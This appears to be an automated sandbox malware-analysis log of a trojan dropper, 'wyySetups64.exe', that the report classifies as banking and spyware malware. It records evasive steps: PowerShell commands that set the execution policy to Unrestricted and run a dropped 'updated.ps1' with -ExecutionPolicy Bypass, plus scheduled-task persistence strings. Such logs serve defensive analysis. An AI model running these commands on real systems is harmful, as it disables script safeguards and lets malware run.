    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3CF308_2_6BF3CF30
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF38F398_2_6BF38F39
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE4EC08_2_6BEE4EC0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF54C208_2_6BF54C20
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE4C008_2_6BEE4C00
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF503748_2_6BF50374
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3A00E8_2_6BF3A00E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF547E08_2_6BF547E0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF547308_2_6BF54730
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF486518_2_6BF48651
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF544B08_2_6BF544B0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF39BEE8_2_6BF39BEE
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF1DBDB8_2_6BF1DBDB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF59AE08_2_6BF59AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF558E08_2_6BF558E0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF238D18_2_6BF238D1
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF55F508_2_6BF55F50
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3FE588_2_6BF3FE58
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF1DCD68_2_6BF1DCD6
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF4FC7C8_2_6BF4FC7C
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE52508_2_6BEE5250
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF4F1F48_2_6BF4F1F4
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF397E28_2_6BF397E2
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF557A08_2_6BF557A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF237858_2_6BF23785
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF4F7388_2_6BF4F738
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF535008_2_6BF53500
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF514FE8_2_6BF514FE
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF554D08_2_6BF554D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3940E8_2_6BF3940E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDFACAF8_2_6CDFACAF
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDEE9948_2_6CDEE994
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDDEBC48_2_6CDDEBC4
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDEE45E8_2_6CDEE45E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDFA5B78_2_6CDFA5B7
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDF266A8_2_6CDF266A
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDBBD528_2_6CDBBD52
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B9C8E09_2_00B9C8E0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B229609_2_00B22960
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B1AA009_2_00B1AA00
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B4AB339_2_00B4AB33
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B30F049_2_00B30F04
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B130C09_2_00B130C0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B1B0509_2_00B1B050
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B171F09_2_00B171F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B8729C9_2_00B8729C
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B312819_2_00B31281
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B492459_2_00B49245
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B174F09_2_00B174F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00BA39CB9_2_00BA39CB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B939709_2_00B93970
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B1FF009_2_00B1FF00
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B1FF709_2_00B1FF70
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dll 0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B1B680 appears 38 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00BA32AD appears 39 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BEEAF2A appears 35 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6CDDE89F appears 50 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BF38E24 appears 211 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BF2405E appears 140 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6CDDE86C appears 192 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BF38E8D appears 69 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BF23F7C appears 178 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B9453E appears 92 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B94D50 appears 75 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B95421 appears 796 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BF3BD0C appears 53 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BF23F0C appears 76 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B31BA2 appears 71 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6CD2C2CF appears 204 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B1B780 appears 68 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B28675 appears 259 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B2CC03 appears 40 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B74164 appears 67 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B95454 appears 83 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6CD31300 appears 46 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B9548A appears 41 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 00B947DC appears 64 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BEE9230 appears 69 times
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: String function: 6BF384F0 appears 50 times
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: String function: 03384300 appears 32 times
    Source: wyySetups64.exeStatic PE information: invalid certificate
    Source: wyySetups64.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
    Source: 360instpatch[1].exe.0.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
    Source: 360instpatch.exe.0.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
    Source: wyySetups64.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
    Source: wyySetups64.exe, 00000000.00000002.1816555843.00000000025F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs wyySetups64.exe
    Source: wyySetups64.exe, 00000000.00000003.1676294648.0000000002651000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs wyySetups64.exe
    Source: wyySetups64.exe, 00000000.00000000.1652850618.00000000006F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs wyySetups64.exe
    Source: wyySetups64.exe, 00000001.00000002.4117289631.00000000024C8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs wyySetups64.exe
    Source: wyySetups64.exeBinary or memory string: OriginalFileName vs wyySetups64.exe
    Source: wyySetups64.exe.0.drBinary or memory string: OriginalFileName vs wyySetups64.exe
    Source: wyySetups64.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
    Source: 360instpatch.exe.0.drBinary string: ZOTAC ZENFASTZENFAS XSTAR XS TAK VASEKY UKINGS TYH TXRUI TURXUN TEKISM TEELKOOUTAISU SS DSUPERSSPSTARSWAYSTARRAM SPCC SHINEDOE SHINEDIS SHINEDISKSAMSWEETREEINNO REEINN RUNENG RAMSTA S QIDAN POWERSSD NETAC SSNETAC SMICROFLA SH MICROFLASH MICROFLAS MERELAIR MAXSUNMACMEMOR LENOVO SLENOVO SLANSHIKUAIKAKINGSTEKKINGSSD_ACSC4MACSC2MACJC2MKINGSPECKINGSHARE KINGSHAR EKING SHAREKING SHAREKING SHA REKINGSANDKINGRICHKINGBANKKINGDINGKINGDIANKDATAJUNSHI INTEIFUNKIFOUNDI-FLASHHY SPEED HY SDEED HISTOR HIGHXGOWE GEIL ZENITHGAMERGALAIRD GALA GAINWARDGLOWAYGLOWA FORSAFASTDISKFASPEE FASPEEDEVTRANEEKOOEAGET SS DDOMONDERLERDRAGONDICABOFITBIOSTAR BIOSTA ASGARD ASINT ASIN APACER ANUCELL GENERIC NCARDHYNIXTECLASTTECLAS KINGFAST COLORFUL COLORFUL SSD NVME ATA KINGSTONPLEXTOR PX-PLEXTO PX-PLEXTO PX-GALAXMICRON MICRON_MLITEONITLITEONSANDISK SANDIS MKNSSDCRUNCOREEDGEPLEXTORMTFDV4-CTM4-CTCRUCIAL ADATA ADATA ADAT PNYAPACERG.SKILLOCZKINGSTONCORSAIRINTELFUJITSUTOSHIB TOSHIBASAMXUNG SAMSUNG1SAMSUN SAMSUNGWDSEAGATESTATA AVD ASDK APPLE HDD ModelASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDriveDeviceIDASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartitionROOT\CIMV2Index\Device\Harddisk\\.\c:%usotmSOFTWARE\360Safe\softmgr\dg{from}{ver}{mid}s.360.cn/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%dl,M~UG
    Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@16/33@8/14
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE5930 SetLastError,GetLastError,SetLastError,GetLastError,_wcsrchr,_wcsncpy,_strerror,MultiByteToWideChar,_wcsncpy,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,FormatMessageW,_wcstok,_vswprintf_s,_wcsncpy,GetSystemTime,LocalFree,FreeLibrary,8_2_6BEE5930
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03377B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,1_2_03377B70
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03377740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_03377740
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03377620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,1_2_03377620
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE7A1F GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,8_2_6BEE7A1F
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,1_2_03376C50
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1000F260 CreateToolhelp32Snapshot,Process32FirstW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,_wcsicmp,CloseHandle,Process32NextW,CloseHandle,0_2_1000F260
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,1_2_03376150
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B80145 _memset,FindResourceW,SizeofResource,LoadResource,LockResource,8_2_00B80145
    Source: C:\Users\user\Downloads\360instpatch.exeFile created: C:\Program Files (x86)\360Jump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeFile created: C:\Users\user\AppData\Roaming\wyySetups64.exeJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeMutant created: NULL
    Source: C:\Users\user\Downloads\360instpatch.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 4460
    Source: C:\Users\user\Downloads\360instpatch.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 3192
    Source: C:\Users\user\Downloads\360instpatch.exeMutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kt5adsyn.rvv.ps1Jump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: wyySetups64.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
    Source: wyySetups64.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
    Source: wyySetups64.exeString found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
    Source: wyySetups64.exeString found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
    Source: 360instpatch.exeString found in binary or memory: /pid=%s /noreboot=1 /installer=1 /SMARTSILENCE
    Source: 360instpatch.exeString found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
    Source: 360instpatch.exeString found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
    Source: wyySetups64.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
    Source: wyySetups64.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
    Source: wyySetups64.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
    Source: wyySetups64.exeString found in binary or memory: /LoadInf=
    Source: C:\Users\user\Desktop\wyySetups64.exeFile read: C:\Users\user\Desktop\wyySetups64.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\wyySetups64.exe "C:\Users\user\Desktop\wyySetups64.exe"
    Source: C:\Users\user\Desktop\wyySetups64.exeProcess created: C:\Users\user\AppData\Roaming\wyySetups64.exe "C:\Users\user\AppData\Roaming\wyySetups64.exe"
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Source: unknownProcess created: C:\Users\user\Downloads\360instpatch.exe C:\Users\user\Downloads\360instpatch.exe
    Source: unknownProcess created: C:\Users\user\Downloads\360instpatch.exe C:\Users\user\Downloads\360instpatch.exe
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Users\user\Desktop\wyySetups64.exeProcess created: C:\Users\user\AppData\Roaming\wyySetups64.exe "C:\Users\user\AppData\Roaming\wyySetups64.exe" Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: netutils.dllJump to behavior
